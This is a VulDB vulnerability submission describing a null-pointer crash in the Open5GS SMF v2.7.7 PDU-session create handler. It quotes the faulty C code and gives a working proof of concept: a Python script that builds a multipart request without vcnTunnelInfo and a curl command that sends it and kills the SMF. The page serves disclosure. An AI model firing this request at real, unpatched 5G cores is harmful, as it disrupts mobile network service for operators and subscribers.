Submit #808482: Open5gs SMF v2.7.7 Denial of Serviceinfo

TitelOpen5gs SMF v2.7.7 Denial of Service
Beschreibung### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description SMF crashes when a `PduSessionCreateData` request for `POST /nsmf-pdusession/v1/pdu-sessions` omits `vcnTunnelInfo`. In `smf_nsmf_handle_create_data_in_hsmf()`, the code intends to reject a missing or incomplete `vcnTunnelInfo`, but its error log dereferences `vcnTunnelInfo` even inside the `!vcnTunnelInfo` branch: ```c vcnTunnelInfo = PduSessionCreateData->vcn_tunnel_info; if (!vcnTunnelInfo || !(vcnTunnelInfo->ipv4_addr || vcnTunnelInfo->ipv6_addr) || !vcnTunnelInfo->gtp_teid) { ogs_error("[%s:%d] No vcnTunnelInfo [%s:%s:%s]", smf_ue->supi, sess->psi, vcnTunnelInfo->ipv4_addr ? vcnTunnelInfo->ipv4_addr : "NULL", vcnTunnelInfo->ipv6_addr ? vcnTunnelInfo->ipv6_addr : "NULL", vcnTunnelInfo->gtp_teid ? vcnTunnelInfo->gtp_teid : "NULL"); ``` So the intended validation path turns into an immediate null-pointer crash. This issue is not a duplicate of the existing callback reports in `report/smf/`; it affects a different SBI route and a different SMF business procedure. As a control, the same request with a valid `vcnTunnelInfo` did not crash the SMF and instead returned a normal `400` error for the next missing mandatory field (`No Max Integrity Protected Data`), confirming that the crash is tied to the absent `vcnTunnelInfo`. ### Steps to reproduce 1. Ensure the Open5GS Docker lab is running and note the SMF IP: ```bash docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf ``` 2. Build a minimal multipart request with valid earlier fields but no `vcnTunnelInfo`: ```bash python3 - <<'PY' from pathlib import Path import json boundary = 'BOUNDARY123' body = { 'supi': 'imsi-001011234567899', 'pduSessionId': 1, 'dnn': 'internet', 'sNssai': {'sst': 1}, 'vsmfId': 'fake-vsmf', 'servingNetwork': {'mcc': '001', 'mnc': '01'}, 'anType': '3GPP_ACCESS', 'ratType': 'NR', 'ueLocation': {'nrLocation': { 'tai': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'tac': '000001'}, 'ncgi': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'nrCellId': '000000001'}, 'ueLocationTimestamp': '2026-04-10T20:56:16Z' }}, 'amfNfId': 'fake-amf', 'guami': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'amfId': '000040'}, 'n1SmInfoFromUe': {'contentId': '5gnas-sm'} } # Minimal UE-to-SM payload in the gsmue format accepted by this handler: n1 = bytes.fromhex('c191a1') parts = [] parts.append( (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode()) + json.dumps(body, separators=(',', ':')).encode() + b'\r\n' ) parts.append( (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n' f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode()) + n1 + b'\r\n' ) parts.append(f'--{boundary}--\r\n'.encode()) Path('/tmp/pdu_create_missing_vcn.multipart').write_bytes(b''.join(parts)) PY ``` 3. Send the request: ```bash curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.10/nsmf-pdusession/v1/pdu-sessions \ -H 'Content-Type: multipart/related; boundary=BOUNDARY123' \ --data-binary @/tmp/pdu_create_missing_vcn.multipart ``` 4. Check SMF state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --since 2026-04-10T20:56:16Z smf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T20:56:29.796110928Z The process exited before emitting an application-level validation error for this request. ``` ### Expected behaviour SMF should reject the malformed create request with a normal `400` error response. ### Observed Behaviour The HTTP/2 stream is reset and the SMF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
Quelle⚠️ https://github.com/open5gs/open5gs/issues/4446
Benutzer
 FrankLin (UID 97501)
Einreichung20.04.2026 21:19 (vor 1 Monat)
Moderieren10.05.2026 16:40 (20 days later)
StatusAkzeptiert
VulDB Eintrag362549 [Open5GS bis 2.7.7 SMF smf_nsmf_handle_create_data_in_hsmf Denial of Service]
Punkte20

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!